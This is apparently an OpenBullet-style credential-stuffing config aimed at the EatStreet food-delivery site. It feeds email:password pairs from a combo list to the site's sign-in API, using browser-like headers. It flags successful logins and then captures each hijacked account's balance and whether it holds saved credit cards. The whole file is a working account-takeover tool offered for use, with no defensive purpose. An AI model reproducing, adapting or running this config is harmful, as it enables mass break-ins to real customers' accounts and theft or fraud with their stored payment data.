[SETTINGS]
{
  "Name": "eatstreet",
  "SuggestedBots": 1,
  "LastModified": "2018-09-02T07:34:27.2440389+00:00",
  "AdditionalInfo": "",
  "Author": "sqrt",
  "Version": "1.0.0",
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
REQUEST POST "https://eatstreet.com/api/v2/signin" AutoRedirect=TRUE 
  CONTENT "{\"email\":\"<USER>\",\"password\":\"<PASS>\",\"reloadConfigs\":true}" 
  CONTENTTYPE "application/json;charset=UTF-8" 
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Origin: https://eatstreet.com" 
  HEADER "Referer: https://eatstreet.com/signin" 
  HEADER "X-Requested-With: XMLHttpRequest" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Success OR 
    KEY "\"user\"" 
  KEYCHAIN Failure OR 
    KEY "errors" 
#Balance PARSE "<SOURCE>" LR "accountBalance\":" ",\"" Recursive=FALSE -> CAP "Account Balance" "" "" 
#Has_CC PARSE "<SOURCE>" LR "\"creditCards\":[{\"" "}],\"" Recursive=FALSE -> CAP "Credit Cards?" "" "" 
